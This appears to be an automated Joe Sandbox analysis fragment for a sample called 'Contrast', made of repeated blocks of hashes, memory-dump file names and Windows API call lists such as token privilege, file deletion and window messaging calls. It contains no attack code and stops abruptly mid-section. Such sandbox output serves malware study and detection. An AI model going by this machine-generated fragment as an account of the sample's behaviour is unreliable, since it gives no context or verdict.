                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 2818976183aa3f239ab7925f9a57741a1018349c67eda9301092ec0ff45f5ec4
                                                                                                                                        • Instruction ID: 7b3dbf64cc8b0b8f697ecdb612772e836e89707108584ceb916237390ace587e
                                                                                                                                        • Opcode Fuzzy Hash: 2818976183aa3f239ab7925f9a57741a1018349c67eda9301092ec0ff45f5ec4
                                                                                                                                        • Instruction Fuzzy Hash: B641E674508351DFEB15DF14C488B5ABFE1BF85308F0988ACE8999B362C375E889CB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00524B29: FreeLibrary.KERNEL32(00000000,?), ref: 00524B63
                                                                                                                                          • Part of subcall function 0053547B: __wfsopen.LIBCMT ref: 00535486
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                                                                                                                                          • Part of subcall function 00524ADE: FreeLibrary.KERNEL32(00000000), ref: 00524B18
                                                                                                                                          • Part of subcall function 005248B0: _memmove.LIBCMT ref: 005248FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1396898556-0
                                                                                                                                        • Opcode ID: 453489974df9896415f1d0b717d1965662075d475eb07c97fd6c5d84d643def2
                                                                                                                                        • Instruction ID: d38ae31b0f4b2ec667d6b24a201e81c93dd156f794405ac9c549a50c71f02e43
                                                                                                                                        • Opcode Fuzzy Hash: 453489974df9896415f1d0b717d1965662075d475eb07c97fd6c5d84d643def2
                                                                                                                                        • Instruction Fuzzy Hash: D711EB31650216ABCF14FB70DC0AF6E7FA6BF82701F104419F541A71D1EB709A51AF94
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                        • Instruction ID: 2c18875aff384e0f40fc87b35de1f246f4f41fc0c1f509e967e4f0027cc09886
                                                                                                                                        • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                        • Instruction Fuzzy Hash: 8F114C76204A01DFC724CF28E585916BBF9FF49350B20882EE48ACB2A1E732E841CB54
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 98b02c9465ca9b5575ecd0f6434378eeb58ed61959d0c8193f4fc90ac0bb4b0e
                                                                                                                                        • Instruction ID: 49226a59236cf95a11e13180fb7adcfca05ffcd1d0d54a38bd9bd610484763b9
                                                                                                                                        • Opcode Fuzzy Hash: 98b02c9465ca9b5575ecd0f6434378eeb58ed61959d0c8193f4fc90ac0bb4b0e
                                                                                                                                        • Instruction Fuzzy Hash: 242103B4508341DFEB14DF14C488B9ABBE1BF89304F05896CF88A57362D731E889DB92
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                        • Instruction ID: a70ce8f56ba26e4a5facd7164ca4877a6d81a948eeb464ee483eb4883d37ca76
                                                                                                                                        • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                        • Instruction Fuzzy Hash: 2C01D672201B126ED7245B38D80AB77BFA8FF857A0F10852AF51ACA1D1EB31E4408B94
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00584998
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1431749950-0
                                                                                                                                        • Opcode ID: 6cb955a1c8ec1be52c6b1c6b003230dc4b9f556969259ed987ce3751cc59e902
                                                                                                                                        • Instruction ID: 842de74525ba28aabc6afbfdbe72561261a2c52a7aaf6449cb2ca07457c7dbf4
                                                                                                                                        • Opcode Fuzzy Hash: 6cb955a1c8ec1be52c6b1c6b003230dc4b9f556969259ed987ce3751cc59e902
                                                                                                                                        • Instruction Fuzzy Hash: B0F0313560820AAF9B14FB65D84EC9F7FBCFF99320B004455F8099B291DE70AD85DB64
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fseek
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2937370855-0
                                                                                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                        • Instruction ID: bb639be3336c389ecff6c1c3051c76e2bd5ac68ab593f3112eae13ded5bc412a
                                                                                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                        • Instruction Fuzzy Hash: F4F085B6400208BFDF108F94EC04CEBBF7AFF89320F004598F9045B210D232EA219BA0
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,005227AF,?,00000001), ref: 00524A63
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 18e5f7c25118636c4ace384ff4eb8d179664f635c1cc6bfdd3b43720de02a0c7
                                                                                                                                        • Instruction ID: 2623584a07edd4296eec3042cdf47ae241201ba6d97a96c0a156b15ba0f3e62f
                                                                                                                                        • Opcode Fuzzy Hash: 18e5f7c25118636c4ace384ff4eb8d179664f635c1cc6bfdd3b43720de02a0c7
                                                                                                                                        • Instruction Fuzzy Hash: A3F01571145722CFCB349F64E894816BFF2BF16325320992EE1D783650C731A984DF44
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 192ee89963bf4a4a3738cc89b5ba5b79104585825a34d990593119606a8abfad
                                                                                                                                        • Instruction ID: d19631f534cc8849d5c05a1ee5f4833ad93306c161771318e274664ff5658695
                                                                                                                                        • Opcode Fuzzy Hash: 192ee89963bf4a4a3738cc89b5ba5b79104585825a34d990593119606a8abfad
                                                                                                                                        • Instruction Fuzzy Hash: D0E02BB17087469EFB309B78D408762FFE8BB41312F10592BD895822C0E3755CDC97A1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                        • Instruction ID: d52cb906e9fa71906f72d9273efd4c2baf79b69d3993a99160b5ee559c2f11f0
                                                                                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                        • Instruction Fuzzy Hash: 0CF0F87240020DFFDF05CF90C945EAABB79FF15314F208589F9198B252D336DA21AB91
                                                                                                                                        APIs
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005309E4
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongNamePath_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2514874351-0
                                                                                                                                        • Opcode ID: 83e161cf7e377b7dad1660cb207304afb0ac03f9e512c8f1d119c0a2d23be73a
                                                                                                                                        • Instruction ID: c416d2baa376bc39d0551a862360f492c4bebc8ba7d8cc978251f2fada2b4cd3
                                                                                                                                        • Opcode Fuzzy Hash: 83e161cf7e377b7dad1660cb207304afb0ac03f9e512c8f1d119c0a2d23be73a
                                                                                                                                        • Instruction Fuzzy Hash: 68E0863290012957C72196989C09FEA77DDEFC9790F0401B6FC08D7244D9609C818695
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                                                                                                                                        • Instruction ID: 6a0ec1af87f7116d7fdcd2dceb7415abfc50cf42cf9fe18b0e907f997e0683aa
                                                                                                                                        • Opcode Fuzzy Hash: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                                                                                                                                        • Instruction Fuzzy Hash: 9BB092B4010680569F281E3C29480993B01A8533A97D86B82E47C856E19339884BF920
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction ID: 32d3da549bdb2f715027d4489c15a5ff5217fc6767f8d308a5e228ae32d0a06f
                                                                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction Fuzzy Hash: 56B0927644020C77CE012A82EC03A593F29AB80668F408020FB0C5C162B673A6A09689
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00574005: FindFirstFileW.KERNEL32(?,?), ref: 0057407C
                                                                                                                                          • Part of subcall function 00574005: DeleteFileW.KERNEL32(?,?,?,?), ref: 005740CC
                                                                                                                                          • Part of subcall function 00574005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 005740DD
                                                                                                                                          • Part of subcall function 00574005: FindClose.KERNEL32(00000000), ref: 005740F4
                                                                                                                                        • GetLastError.KERNEL32 ref: 0057C292
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                        • Opcode ID: ff35ef91a70ea030df371f31008cee3eacd92a37d9d96b97def8e8e8ef7494f3
                                                                                                                                        • Instruction ID: e2bff82d2f2ae056b731853d3de473d6b00ea3751739cf50c85b3cde027d364c
                                                                                                                                        • Opcode Fuzzy Hash: ff35ef91a70ea030df371f31008cee3eacd92a37d9d96b97def8e8e8ef7494f3
                                                                                                                                        • Instruction Fuzzy Hash: CBF08C322102118FDB10EF59E848FAABBE5BF89320F05C419F9498B392CB70BC41DB94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059D208
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D249
                                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0059D28E
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D2B8
                                                                                                                                        • SendMessageW.USER32 ref: 0059D2E1
                                                                                                                                        • _wcsncpy.LIBCMT ref: 0059D359
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0059D37A
                                                                                                                                        • GetKeyState.USER32(00000009), ref: 0059D387
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D39D
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 0059D3A7
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D3D0
                                                                                                                                        • SendMessageW.USER32 ref: 0059D3F7
                                                                                                                                        • SendMessageW.USER32(?,00001030,?,0059B9BA), ref: 0059D4FD
                                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059D513
                                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059D526
                                                                                                                                        • SetCapture.USER32(?), ref: 0059D52F
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0059D594
                                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059D5A1
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059D5BB
                                                                                                                                        • ReleaseCapture.USER32 ref: 0059D5C6
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059D600
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0059D60D
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D669
                                                                                                                                        • SendMessageW.USER32 ref: 0059D697
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D6D4
                                                                                                                                        • SendMessageW.USER32 ref: 0059D703
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D724
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D733
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059D753
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0059D760
                                                                                                                                        • GetParent.USER32(?), ref: 0059D780
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D7E9
                                                                                                                                        • SendMessageW.USER32 ref: 0059D81A
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0059D878
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D8A8
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D8D2
                                                                                                                                        • SendMessageW.USER32 ref: 0059D8F5
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0059D947
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D97B
                                                                                                                                          • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0059DA17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                        • API String ID: 3977979337-4164748364
                                                                                                                                        • Opcode ID: b2451d40486639f739bc4b38d9ddf1974967c89a730f9a21a5f389ddc92ff9d0
                                                                                                                                        • Instruction ID: c39f906daa684cd4331a931d0dbc05e8c86a438795b416eda04271d49ab5c83e
                                                                                                                                        • Opcode Fuzzy Hash: b2451d40486639f739bc4b38d9ddf1974967c89a730f9a21a5f389ddc92ff9d0
                                                                                                                                        • Instruction Fuzzy Hash: E742A035604341AFDB24DF28C848BAABFF5FF89310F140A19F695872A1D771D858EB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00569399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
                                                                                                                                          • Part of subcall function 00569399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
                                                                                                                                          • Part of subcall function 00569399: GetLastError.KERNEL32 ref: 0056941D
                                                                                                                                        • _memset.LIBCMT ref: 00568F71
                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00568FC3
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00568FD4
                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00568FEB
                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00569004
                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 0056900E
                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00569028
                                                                                                                                          • Part of subcall function 00568DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568F27), ref: 00568DFE
                                                                                                                                          • Part of subcall function 00568DE9: CloseHandle.KERNEL32(?,?,00568F27), ref: 00568E10
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
